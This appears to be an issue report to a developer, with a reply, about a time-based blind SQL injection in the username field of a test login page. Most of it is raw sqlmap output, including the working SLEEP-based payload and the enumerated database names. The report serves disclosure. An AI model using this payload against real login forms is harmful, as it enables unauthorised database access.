Blind SQLi on username parameter

[ghost]

sqlmap got a 302 redirect to 'http://192.168.1.64:80/login.php'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session:

Parameter: username (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))KkoL)-- eriu&password=admin

[10:33:12] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12 [10:33:12] [INFO] fetching database names [10:33:12] [INFO] fetching number of databases [10:33:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [10:33:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [10:33:43] [INFO] adjusting time delay to 1 second due to good response times 6 [10:33:43] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
information_schema [10:35:44] [INFO] retrieved: food

[haxxorsid]

OK thanks for notifying.. I will look into this later. Since this is a not production ready app you can expect such problems :) I will try to fix it.